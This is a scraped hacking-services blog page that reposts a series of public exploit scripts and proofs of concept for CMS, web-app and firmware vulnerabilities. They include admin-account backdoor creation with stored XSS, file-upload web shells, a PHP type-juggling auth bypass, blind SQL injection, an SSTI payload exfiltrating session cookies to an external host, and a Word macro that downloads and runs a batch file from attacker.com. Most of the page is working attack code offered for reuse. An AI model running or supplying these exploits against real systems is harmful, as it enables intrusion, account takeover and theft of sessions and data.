Jump to content

Hacker Technology

A group blog by Leader in Hacker Website - Providing Professional Ethical Hacking Services

  • Entries

    16114

  • Comments

    7952

  • Views

    863113891

Contributors to this blog

  • HireHackking 16114

About this blog

Hacking techniques include penetration testing, network security, reverse cracking, malware analysis, vulnerability exploitation, encryption cracking, social engineering, etc., used to identify and fix security flaws in systems.

HireHackking 
# Exploit Title: PimpMyLog v1.7.14 - Improper access control
# Date: 2023-07-10
# Exploit Author: thoughtfault
# Vendor Homepage: https://www.pimpmylog.com/
# Software Link: https://github.com/potsky/PimpMyLog
# Version: 1.5.2-1.7.14
# Tested on: Ubuntu 22.04
# CVE : N/A
# Description: PimpMyLog suffers from improper access control on the account creation endpoint, allowing a remote attacker to create an admin account without any existing permissions. The username is not sanitized and can be leveraged as a vector for stored XSS. This allows the attacker to hide the presence of the backdoor account from legitimate admins.  Depending on the previous configuration, an attacker may be able to view sensitive information in apache, iis, nginx, and/or php logs. The attacker can view server-side environmental variables through the debug feature, which may include passwords or api keys.
import requests
import argparse
from base64 import b64encode

js = """var table = document.getElementById("userlisttable");
var rows = table.getElementsByTagName("tr");
for (var i = 0; i < rows.length; i++) {
  var cells = rows[i].getElementsByTagName("td");
  for (var j = 0; j < cells.length; j++) {
    var anchors = cells[j].getElementsByTagName("a");
    for (var k = 0; k < anchors.length; k++) {
      if (
        anchors[k].innerText === "{}" ||
        anchors[k].innerText.includes("atob(") ||
        anchors[k].querySelector("script") !== null
      ) {
        rows[i].parentNode.removeChild(rows[i]);
      }
    }
  }
}
var userCountElement = document.querySelector('.lead');
var userCountText = userCountElement.textContent;
var userCount = parseInt(userCountText);
if(!isNaN(userCount)){
        userCount--;
        userCountElement.textContent = userCount + ' Users';
}"""

payload = "<script>eval(atob('{}'));</script>"


def backdoor(url, username, password):
    config_url = url + '/inc/configure.php'

    print("[*] Creating admin account...")
    r = requests.post(config_url, data={'s':'authsave', 'u': username, 'p': password})
    if r.status_code != 200:
        print("[!] An error occured")
        return

    print("[*] Hiding admin account...")
    base64_js = b64encode(js.format(username).encode()).decode()
    xss_payload = payload.format(base64_js)

    r = requests.post(config_url, data={'s':'authsave', 'u': xss_payload, 'p': password})
    if r.status_code != 200:
        print("[!] An error occured")
        return


    print("[*] Exploit finished!")

parser = argparse.ArgumentParser()
parser.add_argument('--url', help='The base url of the target', required=True)
parser.add_argument('--username', default='backdoor', help='The username of the backdoor account')
parser.add_argument('--password', default='backdoor', help='The password of the backdoor account')
args = parser.parse_args()

backdoor(args.url.rstrip('/'), args.username, args.password)
HireHackking 
#Exploit Title: Pluck v4.7.18 - Remote Code Execution (RCE)
#Application: pluck
#Version: 4.7.18
#Bugs:  RCE
#Technology: PHP
#Vendor URL: https://github.com/pluck-cms/pluck
#Software Link: https://github.com/pluck-cms/pluck
#Date of found: 10-07-2023
#Author: Mirabbas Ağalarov
#Tested on: Linux 


import requests
from requests_toolbelt.multipart.encoder import MultipartEncoder

login_url = "http://localhost/pluck/login.php"
upload_url = "http://localhost/pluck/admin.php?action=installmodule"
headers = {"Referer": login_url,}
login_payload = {"cont1": "admin","bogus": "","submit": "Log in"}

file_path = input("ZIP file path: ")

multipart_data = MultipartEncoder(
    fields={
        "sendfile": ("mirabbas.zip", open(file_path, "rb"), "application/zip"),
        "submit": "Upload"
    }
)

session = requests.Session()
login_response = session.post(login_url, headers=headers, data=login_payload)


if login_response.status_code == 200:
    print("Login account")

 
    upload_headers = {
        "Referer": upload_url,
        "Content-Type": multipart_data.content_type
    }
    upload_response = session.post(upload_url, headers=upload_headers, data=multipart_data)

    
    if upload_response.status_code == 200:
        print("ZIP file download.")
    else:
        print("ZIP file download error. Response code:", upload_response.status_code)
else:
    print("Login problem. response code:", login_response.status_code)


rce_url="http://localhost/pluck/data/modules/mirabbas/miri.php"

rce=requests.get(rce_url)

print(rce.text)
HireHackking 
# Exploit Title: phpfm v1.7.9 - Authentication type juggling
# Date: 2023-07-10
# Exploit Author: thoughtfault
# Vendor Homepage: https://www.dulldusk.com/phpfm/
# Software Link: https://github.com/dulldusk/phpfm/
# Version: 1.6.1-1.7.9
# Tested on: Ubuntu 22.04
# CVE : N/A
"""
An authentication bypass exists in when the hash of the password selected by the user incidently begins with 0e, 00e, and in some PHP versions, 0x. This is because loose type comparision is performed between the password hash and the loggedon value, which by default for an unauthenticated user is 0 and can additionally be controlled by the attacker.  This allows an attacker to bypass the login and obtain remote code execution.

A list of vulnerable password hashes can be found here.
https://github.com/spaze/hashes/blob/master/md5.md
"""
import requests
import sys

if len(sys.argv) < 2:
    print(f"[*] Syntax: ./{__file__} http://target/")
    sys.exit(0)


url = sys.argv[1].rstrip('/') + "/index.php"

payload_name = "shell.php"
payload = '<?php echo "I am a shell"; ?>'
payload_url = url.replace("index.php", payload_name)

headers = {"Accept-Language": "en-US,en;q=0.5", "Cookie": "loggedon=0"}
files = {"dir_dest": (None, "/srv/http/"), "action": (None, "10"), "upfiles[]": ("shell.php", payload) }

requests.post(url, headers=headers, files=files)

r = requests.get(payload_url)
if r.status_code == 200:
    print(f"[*] Exploit sucessfull: {payload_url}")
    print(r.text)
else:
    print(f"[*] Exploit might have failed, payload url returned a non-200 status code of: {r.status_code}" )
HireHackking 
# Exploit Title: Joomla! com_booking component 2.4.9 - Information Leak (Account enumeration)
# Google Dork: inurl:"index.php?option=com_booking"
# Date: 07/12/2023
# Exploit Author: qw3rTyTy
# Vendor Homepage: http://www.artio.net/
# Software Link: http://www.artio.net/downloads/joomla/book-it/book-it-2-free/download
# Version: 2.4.9
# Tested on: Slackware/Nginx/Joomla! 3.10.11
#
##
# File: site/booking.php
#
# <?php
# [...]
#18 include_once (JPATH_COMPONENT_ADMINISTRATOR . DS . 'booking.php');
# [...]
#
# File: admin/booking.php
#
# <?php
# [...]
#104 if (class_exists(($classname = AImporter::controller()))) {
#105 $controller = new $classname();
#106 /* @var $controller JController */
#107 $controller->execute(JRequest::getVar('task'));
#108 $controller->redirect();
#109 }
# [...]
#
# File: admin/controllers/customer.php
#
# <?php
# [...]
#240 function getUserData() {
#241 $user = JFactory::getUser(JRequest::getInt('id'));
#242 $data = array('name' => $user->name, 'username' => $user->username, 'email' => $user->email);
#243 die(json_encode($data));
#244 }
# [...]
#
# A following GET request is equivalent to doing a query like 'SELECT name, username, email FROM abcde_users WHERE id=123'.
#
# curl -X GET http://target/joomla/index.php?option=com_booking&controller=customer&task=getUserData&id=123
#
# So, an attacker can easily enumerate all accounts by bruteforcing.
#
##
import argparse
import urllib.parse
import requests
from sys import exit
from time import sleep

def enumerateAccounts(options):
    i = 1
    url = options.url
    url = url + "/index.php?option=com_booking&controller=customer&task=getUserData&id="

    while True:
        try:
            response = requests.get("{}{}".format(url, str(i)))

            if response.status_code == 200:
                try:
                    jsondocument = response.json()
                    if jsondocument["name"] != None:
                        print(jsondocument)
                except requests.exceptions.JSONDecodeError:
                    raise
                else:
                    break
            except Exception as ex:
                print(ex)
                break

        i += 1

def main():
    p = argparse.ArgumentParser()
    p.add_argument("-u", "--url", type=str, required=True)
    parsed = p.parse_args()

    try:
        t = urllib.parse.urlparse(parsed.url)
    except ValueError as ex:
        print(ex)
        exit()

    if not t[0].startswith("http") and not t[0].startswith("https"):
        print("Improper URL given.")
        exit()

    if len(t[1]) == 0:
        print("Improper URL given.")
        exit()

    enumerateAccounts(parsed)

if __name__ == "__main__":
    main()
HireHackking
#!/bin/bash # Exploit Title: Online Piggery Management System v1.0 - unauthenticated file upload vulnerability # Date: July 12 2023 # Exploit Author: 1337kid # Software Link: https://www.sourcecodester.com/php/11814/online-pig-management-system-basic-free-version.html # Version: 1.0 # Tested on: Ubuntu # CVE : CVE-2023-37629 # # chmod +x exploit.sh # ./exploit.sh web_url # ./exploit.sh http://127.0.0.1:8080/ echo " _____ _____ ___ __ ___ ____ ________ __ ___ ___ " echo " / __\\ \\ / / __|_|_ ) \\_ )__ /__|__ /__ / /|_ ) _ \\" echo " | (__ \\ V /| _|___/ / () / / |_ \\___|_ \\ / / _ \\/ /\\_, /" echo " \\___| \\_/ |___| /___\\__/___|___/ |___//_/\\___/___|/_/ " echo " @1337kid" echo if [[ $1 == '' ]]; then echo "No URL specified!" exit fi base_url=$1 unauth_file_upload() { # CVE-2023-37629 - File upload vuln echo "Generating shell.php" #=========== cat > shell.php << EOF <?php system(\$_GET['cmd']); ?> EOF #=========== echo "done" curl -s -F pigphoto=@shell.php -F submit=pwned $base_url/add-pig.php > /dev/null req=$(curl -s -I $base_url"uploadfolder/shell.php?cmd=id" | head -1 | awk '{print $2}') if [[ $req == "200" ]]; then echo "Shell uploaded to $(echo $base_url)uploadfolder/shell.php" else echo "Failed to upload a shell" fi } req=$(curl -I -s $base_url | head -1 | awk '{print $2}') if [[ $req -eq "200" ]]; then unauth_file_upload else echo "Error" echo "Status Code: $req" fi
HireHackking
#Exploit Title: CmsMadeSimple v2.2.17 - session hijacking via Server-Side Template Injection (SSTI) #Application: CmsMadeSimple #Version: v2.2.17 #Bugs: SSTI #Technology: PHP #Vendor URL: https://www.cmsmadesimple.org/ #Software Link: https://www.cmsmadesimple.org/downloads/cmsms #Date of found: 13-07-2023 #Author: Mirabbas Ağalarov #Tested on: Linux 2. Technical Details & POC ======================================== Steps: 1. Login to test user account 2. Go to Content Manager 3. Add New Content 4. set as ''' {$smarty.version} {{7*7}} {$smarty.now} {$smarty.template} <img src=YOU-SERVER/{$smarty.cookies.CMSSESSID852a6e69ca02}> <img src=YOU-SERVER/{$smarty.cookies.34a3083b62a225efa0bc6b5b43335d226264c2c1}> <img src=YOU_SERVER/{$smarty.cookies.__c}> ''' to conten_en section. 5.If any user visit to page, Hacker hijack all cookie payload: %3Cp%3E%7B%24smarty.version%7D+%7B%7B7*7%7D%7D+%7B%24smarty.now%7D+%7B%24smarty.template%7D+%3Cimg+src%3D%22https%3A%2F%2Fen3uw3qy2e0zs.x.pipedream.net%2F%7B%24smarty.cookies.CMSSESSID852a6e69ca02%7D%22+%2F%3E+%3Cimg+src%3D%22https%3A%2F%2Fen3uw3qy2e0zs.x.pipedream.net%2F%7B%24smarty.cookies.34a3083b62a225efa0bc6b5b43335d226264c2c1%7D%22+%2F%3E+%3Cimg+src%3D%22https%3A%2F%2Fen3uw3qy2e0zs.x.pipedream.net%2F%7B%24smarty.cookies.__c%7D%22+%2F%3E%3C%2Fp%3E POC Request POST /admin/moduleinterface.php?mact=CMSContentManager,m1_,admin_editcontent,0&;__c=1c2c31a1c1bff4819cd&;m1_content_id=81&showtemplate=false HTTP/1.1 Host: localhost Content-Length: 988 sec-ch-ua: Accept: application/json, text/javascript, */*; q=0.01 Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.134 Safari/537.36 sec-ch-ua-platform: "" Origin: http://localhost Sec-Fetch-Site: same-origin Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Referer: http://localhost/ Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Cookie: CMSSESSID852a6e69ca02=bq83g023otkn4s745acdnvbnu4; 34a3083b62a225efa0bc6b5b43335d226264c2c1=1e91865ac5c59e34f8dc1ddb6fd168a61246751d%3A%3AeyJ1aWQiOjEsInVzZXJuYW1lIjoiYWRtaW4iLCJlZmZfdWlkIjoyLCJlZmZfdXNlcm5hbWUiOiJ0ZXN0IiwiaGFzaCI6IiQyeSQxMCRDQlwvWEIyNEpsWmhJNjhKQ29LcWplZXgyOUVXRDRGN2E1MTNIdUo2c3VXMUd1V3NKRTBNcEMifQ%3D%3D; __c=1c2c31a1c1bff4819cd Connection: close mact=CMSContentManager%2Cm1_%2Cadmin_editcontent%2C0&__c=1c2c31a1c1bff4819cd&m1_content_id=81&m1_active_tab=&m1_content_type=content&title=test&content_en=%3Cp%3E%7B%24smarty.version%7D+%7B%7B7*7%7D%7D+%7B%24smarty.now%7D+%7B%24smarty.template%7D+%3Cimg+src%3D%22https%3A%2F%2Fen3uw3qy2e0zs.x.pipedream.net%2F%7B%24smarty.cookies.CMSSESSID852a6e69ca02%7D%22+%2F%3E+%3Cimg+src%3D%22https%3A%2F%2Fen3uw3qy2e0zs.x.pipedream.net%2F%7B%24smarty.cookies.34a3083b62a225efa0bc6b5b43335d226264c2c1%7D%22+%2F%3E+%3Cimg+src%3D%22https%3A%2F%2Fen3uw3qy2e0zs.x.pipedream.net%2F%7B%24smarty.cookies.__c%7D%22+%2F%3E%3C%2Fp%3E&menutext=test&parent_id=-1&showinmenu=0&showinmenu=1&titleattribute=&accesskey=&tabindex=&target=---&metadata=&pagedata=&design_id=2&template_id=10&alias=test&active=0&active=1&secure=0&cachable=0&cachable=1&image=&thumbnail=&extra1=&extra2=&extra3=&wantschildren=0&wantschildren=1&searchable=0&searchable=1&disable_wysiwyg=0&ownerid=1&additional_editors=&m1_ajax=1&m1_apply=1 Poc Video: https://youtu.be/zq3u3jRpfqM
HireHackking

Blackcat Cms v1.4 - Stored XSS

HACKER · %s · %s

Exploit Title: Blackcat Cms v1.4 - Stored XSS Application: blackcat Cms Version: v1.4 Bugs: Stored XSS Technology: PHP Vendor URL: https://blackcat-cms.org/ Software Link: https://github.com/BlackCatDevelopment/BlackCatCMS Date of found: 13.07.2023 Author: Mirabbas Ağalarov Tested on: Linux 2. Technical Details & POC ======================================== steps: 1. login to account 2. go to pages (http://localhost/BlackCatCMS-1.4/upload/backend/pages/modify.php?page_id=1) 3. set as <img src=x onerror=alert(4)> 4. Visit http://localhost/BlackCatCMS-1.4/upload/page/welcome.php?preview=1
HireHackking

CmsMadeSimple v2.2.17 - Remote Code Execution (RCE)

HACKER · %s · %s

#Exploit Title: CmsMadeSimple v2.2.17 - Remote Code Execution (RCE) #Application: CmsMadeSimple #Version: v2.2.17 #Bugs: Remote Code Execution(RCE) #Technology: PHP #Vendor URL: https://www.cmsmadesimple.org/ #Software Link: https://www.cmsmadesimple.org/downloads/cmsms #Date of found: 12-07-2023 #Author: Mirabbas Ağalarov #Tested on: Linux import requests login_url = 'http://localhost/admin/login.php' username=input('username = ') password=input('password = ') upload_url = 'http://localhost/admin/moduleinterface.php' file_path = input("please phar file name but file must same directory with python file and file content : <?php echo system('cat /etc/passwd') ?> : ") #phar file content """"<?php echo system('cat /etc/passwd') ?>""""" login_data = { 'username': username, 'password': password, 'loginsubmit': 'Submit' } session = requests.Session() response = session.post(login_url, data=login_data) if response.status_code == 200: print('Login account') else: print('Login promlem.') exit() files = { 'm1_files[]': open(file_path, 'rb') } data = { 'mact': 'FileManager,m1_,upload,0', '__c': session.cookies['__c'], 'disable_buffer': '1' } response = session.post(upload_url, files=files, data=data) if response.status_code == 200: print('file upload') rce_url=f"http://localhost/uploads/{file_path}" rce=requests.get(rce_url) print(rce.text) else: print('file not upload')
HireHackking

CmsMadeSimple v2.2.17 - Stored Cross-Site Scripting (XSS)

HACKER · %s · %s

#Exploit Title: CmsMadeSimple v2.2.17 - Stored Cross-Site Scripting (XSS) #Application: CmsMadeSimple #Version: v2.2.17 #Bugs: Stored Xss #Technology: PHP #Vendor URL: https://www.cmsmadesimple.org/ #Software Link: https://www.cmsmadesimple.org/downloads/cmsms #Date of found: 12-07-2023 #Author: Mirabbas Ağalarov #Tested on: Linux 2. Technical Details & POC ======================================== steps: 1. Login to account 2. Go to Content Manager 3. Add New Content 4. Type as '<img src=x onerror=alert(document.cookie)>' to metadata section payload: <img src=x onerror=alert(document.cookie)> 5. Submit Content 6. Visit Content (http://localhost/index.php?page=test) Request: POST /admin/moduleinterface.php?mact=CMSContentManager,m1_,admin_editcontent,0&;__c=5c64b42fb42c1d6bba6&showtemplate=false HTTP/1.1 Host: localhost Content-Length: 584 sec-ch-ua: Accept: application/json, text/javascript, */*; q=0.01 Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.134 Safari/537.36 sec-ch-ua-platform: "" Origin: http://localhost Sec-Fetch-Site: same-origin Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Referer: http://localhost/ Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Cookie: CMSSESSID852a6e69ca02=g13p5ucajc0v5tker6ifdcaso5; 34a3083b62a225efa0bc6b5b43335d226264c2c1=24f612918e7b1c1e085bed5cab82f2a786f45d5c%3A%3AeyJ1aWQiOjEsInVzZXJuYW1lIjoiYWRtaW4iLCJlZmZfdWlkIjpudWxsLCJlZmZfdXNlcm5hbWUiOm51bGwsImhhc2giOiIkMnkkMTAkLndYMkFFZnc4WTJlcWhhQVJ2LndZT1FVY09hTzMzeVlNYzVDU1V5NnFRQkxkeXJZNUozSTYifQ%3D%3D; __c=5c64b42fb42c1d6bba6 Connection: close mact=CMSContentManager%2Cm1_%2Cadmin_editcontent%2C0&__c=5c64b42fb42c1d6bba6&m1_content_id=0&m1_active_tab=&m1_content_type=content&title=test&content_en=%3Cp%3Etest%3C%2Fp%3E&menutext=&parent_id=-1&showinmenu=0&showinmenu=1&titleattribute=&accesskey=&tabindex=&target=---&metadata=%3Cimg+src%3Dx+onerror%3Dalert(document.cookie)%3E&pagedata=&design_id=2&template_id=10&alias=&active=0&active=1&secure=0&cachable=0&cachable=1&image=&thumbnail=&extra1=&extra2=&extra3=&wantschildren=0&wantschildren=1&searchable=0&searchable=1&disable_wysiwyg=0&additional_editors=&m1_ajax=1&m1_apply=1
HireHackking
# Exploit Title: Hikvision Hybrid SAN Ds-a71024 Firmware - Multiple Remote Code Execution # Date: 16 July 2023 # Exploit Author: Thurein Soe # CVE : CVE-2022-28171 # Vendor Homepage: https://www.hikvision.com # Software Link: N/A # Refence Link: https://cve.report/CVE-2022-28171 # Version: Filmora 12: Ds-a71024 Firmware, Ds-a71024 Firmware Ds-a71048r-cvs Firmware Ds-a71048 Firmware Ds-a71072r Firmware Ds-a71072r Firmware Ds-a72024 Firmware Ds-a72024 Firmware Ds-a72048r-cvs Firmware Ds-a72072r Firmware Ds-a80316s Firmware Ds-a80624s Firmware Ds-a81016s Firmware Ds-a82024d Firmware Ds-a71048r-cvs Ds-a71024 Ds-a71048 Ds-a71072r Ds-a80624s Ds-a82024d Ds-a80316s Ds-a81016s ''' Vendor Description: Hikvision is a world-leading surveillance manufacturer and supplier of video surveillance and Internet of Things (IoT) equipment for civilian and military purposes. Some Hikvision Hybrid SAN products were vulnerable to multiple remote code execution vulnerabilities such as command injection, Blind SQL injection, HTTP request smuggling, and reflected cross-site scripting. This resulted in remote code execution that allows an adversary to execute arbitrary operating system commands and more. However, an adversary must be on the same network to leverage this vulnerability to execute arbitrary commands. Vulnerability description: A manual test confirmed that The download type parameter was vulnerable to Blind SQL injection.I created a Python script to automate and enumerate SQL versions as the Application was behind the firewall and block all the requests from SQLmap. Request Body: GET /web/log/dynamic_log.php?target=makeMaintainLog&downloadtype='(select*from(select(sleep(10)))a)' HTTP/1.1 Host: X.X.X.X.12:2004 Accept-Encoding: gzip, deflate Accept: */* Accept-Language: en User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.82 Safari/537.36 Connection: close POC: ''' import requests import time url = "http://X.X.X.X:2004/web/log/dynamic_log.php" # Function to check if the response time is greater than the specified delay def is_response_time_delayed(response_time, delay): return response_time >= delay # Function to perform blind SQL injection and check the response time def perform_blind_sql_injection(payload): proxies = { 'http': 'http://localhost:8080', 'https': 'http://localhost:8080', } params = { 'target': 'makeMaintainLog', 'downloadtype': payload } headers = { 'Accept-Encoding': 'gzip, deflate', 'Accept': '*/*', 'Accept-Language': 'en', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.82 Safari/537.36', 'Connection': 'close' } start_time = time.time() response = requests.get(url, headers=headers, params=params, proxies=proxies) end_time = time.time() response_time = end_time - start_time return is_response_time_delayed(response_time, 20) # Enumerate the MySQL version def enumerate_mysql_version(): version_Name = '' sleep_time = 10 # Sleep time is 10 seconds payloads = [ f"' AND (SELECT IF(ASCII(SUBSTRING(@@version, {i}, 1))={mid}, SLEEP({sleep_time}), 0))-- -" for i in range(1, 11) for mid in range(256) ] for payload in payloads: if perform_blind_sql_injection(payload): mid = payload.split("=")[-1].split(",")[0] version_Name += chr(int(mid)) return version_Name # Enumeration is completed version_Name = enumerate_mysql_version() print("MySQL version is:", version_Name)
HireHackking
## Title: Microsoft Office 365 Version 18.2305.1222.0 - Elevation of Privilege + RCE. ## Author: nu11secur1ty ## Date: 07.18.2023 ## Vendor: https://www.microsoft.com/ ## Software: https://www.microsoft.com/en-us/microsoft-365/microsoft-office ## Reference: https://portswigger.net/web-security/access-control ## CVE-2023-33148 ## Description: The Microsoft Office 365 Version 18.2305.1222.0 app is vulnerable to Elevation of Privilege. The attacker can use this vulnerability to attach a very malicious WORD file in the Outlook app which is a part of Microsoft Office 365 and easily can trick the victim to click on it - opening it and executing a very dangerous shell command, in the background of the local PC. This execution is without downloading this malicious file, and this is a potential problem and a very dangerous case! This can be the end of the victim's PC, it depends on the scenario. ## Staus: HIGH Vulnerability [+]Exploit: - Exploit Server: ```vb Sub AutoOpen() Call Shell("cmd.exe /S /c" & "curl -s https://attacker.com/uqev/namaikitiputkata/golemui.bat > salaries.bat && .\salaries.bat", vbNormalFocus) End Sub ``` ## Reproduce: [href](https://github.com/nu11secur1ty/Windows11Exploits/tree/main/2023/CVE-2023-33148) ## Proof and Exploit [href](https://www.nu11secur1ty.com/2023/07/cve-2023-33148.html) ## Time spend: 00:35:00
HireHackking

Wifi Soft Unibox Administration 3.0 & 3.1 - SQL Injection

HACKER · %s · %s

# Exploit Title: Wifi Soft Unibox Administration 3.0 & 3.1 Login Page - Sql Injection # Google Dork: intext:"Unibox Administration 3.1", intext:"Unibox 3.0" # Date: 07/2023 # Exploit Author: Ansh Jain @sudoark # Author Contact : arkinux01@gmail.com # Vendor Homepage: https://www.wifi-soft.com/ # Software Link: https://www.wifi-soft.com/products/unibox-hotspot-controller.php # Version: Unibox Administration 3.0 & 3.1 # Tested on: Microsoft Windows 11 # CVE : CVE-2023-34635 # CVE URL : https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-34635 The Wifi Soft Unibox Administration 3.0 and 3.1 Login Page is vulnerable to SQL Injection, which can lead to unauthorised admin access for attackers. The vulnerability occurs because of not validating or sanitising the user input in the username field of the login page and directly sending the input to the backend server and database. ## How to Reproduce Step 1 : Visit the login page and check the version, whether it is 3.0, 3.1, or not. Step 2 : Add this payload " 'or 1=1 limit 1-- - " to the username field and enter any random password. Step 3 : Fill in the captcha and hit login. After hitting login, you have been successfully logged in as an administrator and can see anyone's user data, modify data, revoke access, etc. -------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ### Login Request -------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ----------------------------------------------------------------------------------------------------------------------- Parameters: username, password, captcha, action ----------------------------------------------------------------------------------------------------------------------- POST /index.php HTTP/2 Host: 255.255.255.255.host.com Cookie: PHPSESSID=rfds9jjjbu7jorb9kgjsko858d User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded Content-Length: 83 Origin: https://255.255.255.255.host.com Referer: https://255.255.255.255.host.com/index.php Upgrade-Insecure-Requests: 1 Sec-Fetch-Dest: document Sec-Fetch-Mode: navigate Sec-Fetch-Site: same-origin Sec-Fetch-User: ?1 Te: trailers username='or+1=1+limit+1--+-&password=randompassword&captcha=69199&action=Login -------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ### Login Response -------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- HTTP/2 302 Found Server: nginx Date: Tue, 18 Jul 2023 13:32:14 GMT Content-Type: text/html; charset=UTF-8 Location: ./dashboard/dashboard Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache -------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ### Successful Loggedin Request -------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- GET /dashboard/dashboard HTTP/2 Host: 255.255.255.255.host.com Cookie: PHPSESSID=rfds9jjjbu7jorb9kgjsko858d User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: https://255.255.255.255.host.com/index.php Upgrade-Insecure-Requests: 1 Sec-Fetch-Dest: document Sec-Fetch-Mode: navigate Sec-Fetch-Site: same-origin Sec-Fetch-User: ?1 Te: trailers -------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ### Successful Loggedin Response -------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- HTTP/2 200 OK Server: nginx Date: Tue, 18 Jul 2023 13:32:43 GMT Content-Type: text/html; charset=UTF-8 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache Cache_control: private <!DOCTYPE html> <html lang="en"> html content </html>
HireHackking

Boom CMS v8.0.7 - Cross Site Scripting

HACKER · %s · %s

# Exploit Title: Boom CMS v8.0.7 - Cross Site Scripting References (Source): https://www.vulnerability-lab.com/get_content.php?id=2274 Release Date: 2023-07-03 Vulnerability Laboratory ID (VL-ID): 2274 Product & Service Introduction: =============================== Boom is a fully featured, easy to use CMS. More than 10 years, and many versions later, Boom is an intuitive, WYSIWYG CMS that makes life easy for content editors and website managers. Working with BoomCMS is simple. It's easy and quick to learn and start creating content. It gives editors control but doesn't require any technical knowledge. (Copy of the Homepage:https://www.boomcms.net/boom-boom ) Abstract Advisory Information: ============================== The vulnerability laboratory core research team discovered a persistent cross site vulnerability in the Boom CMS v8.0.7 web-application. Affected Product(s): ==================== UXB London Product: Boom v8.0.7 - Content Management System (Web-Application) Vulnerability Disclosure Timeline: ================================== 2022-07-24: Researcher Notification & Coordination (Security Researcher) 2022-07-25: Vendor Notification (Security Department) 2023-**-**: Vendor Response/Feedback (Security Department) 2023-**-**: Vendor Fix/Patch (Service Developer Team) 2023-**-**: Security Acknowledgements (Security Department) 2023-07-03: Public Disclosure (Vulnerability Laboratory) Discovery Status: ================= Published Exploitation Technique: ======================= Remote Severity Level: =============== Medium Authentication Type: ==================== Restricted Authentication (User Privileges) User Interaction: ================= Low User Interaction Disclosure Type: ================ Responsible Disclosure Technical Details & Description: ================================ A persistent script code injection web vulnerability has been discovered in the official Boom CMS v8.0.7 web-application. The vulnerability allows remote attackers to inject own malicious script codes with persistent attack vector to compromise browser to web-application requests from the application-side. The vulnerability is located in the input fields of the album title and album description in the asset-manager module. Attackers with low privileges are able to add own malformed albums with malicious script code in the title and description. After the inject the albums are being displayed in the backend were the execute takes place on preview of the main assets. The attack vector of the vulnerability is persistent and the request method to inject is post. The validation tries to parse the content by usage of a backslash. Thus does not have any impact to inject own malicious java-scripts because of its only performed for double- and single-quotes to prevent sql injections. Successful exploitation of the vulnerability results in session hijacking, persistent phishing attacks, persistent external redirects to malicious source and persistent manipulation of affected application modules. Request Method(s): [+] POST Vulnerable Module(s): [+] assets-manager (album) Vulnerable Function(s): [+] add Vulnerable Parameter(s): [+] title [+] description Affected Module(s): [+] Frontend (Albums) [+] Backend (Albums Assets) Proof of Concept (PoC): ======================= The persistent input validation web vulnerability can be exploited by remote attackers with low privileged user account and with low user interaction. For security demonstration or to reproduce the persistent cross site web vulnerability follow the provided information and steps below to continue. Manual steps to reproduce the vulnerability ... 1. Login to the application as restricted user 2. Create a new album 3. Inject a test script code payload to title and description 4. Save the request 5. Preview frontend (albums) and backend (assets-manager & albums listing) to provoke the execution 6. Successful reproduce of the persistent cross site web vulnerability! Payload(s): ><script>alert(document.cookie)</script><div style=1 <a onmouseover=alert(document.cookie)>test</a> --- PoC Session Logs (Inject) --- https://localhost:8000/boomcms/album/35 Host: localhost:8000 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:90.0) Gecko/20100101 Firefox/90.0 Accept: application/json, text/javascript, */*; q=0.01 Content-Type: application/json X-Requested-With: XMLHttpRequest Content-Length: 263 Origin:https://localhost:8000 Connection: keep-alive Referer:https://localhost:8000/boomcms/asset-manager/albums/[evil.source] Sec-Fetch-Site: same-origin {"asset_count":1,"id":35,"name":""><[INJECTED SCRIPT CODE PAYLOAD 1!]>","description":""><[INJECTED SCRIPT CODE PAYLOAD 2!]>", "slug":"a","order":null,"site_id":1,"feature_image_id":401,"created_by":9,"deleted_by" :null,"deleted_at":null,"created_at":"2021-xx-xx xx:x:x","updated_at":"2021-xx-xx xx:x:x"} - PUT: HTTP/1.1 200 OK Server: Apache Cache-Control: no-cache, private Set-Cookie: Max-Age=7200; path=/ Cookie: laravel_session=eyJpdiI6ImVqSkTEJzQjlRPT0iLCJ2YWx1ZSI6IkxrdUZNWUF VV1endrZk1TWkxxdnErTUFDY2pBS0JSYTVFakppRnNub1kwSkF6amQTYiLCJtY yOTUyZTk3MjhlNzk1YWUzZWQ5NjNhNmRkZmNlMTk0NzQ5ZmQ2ZDAyZTED; Max-Age=7200; 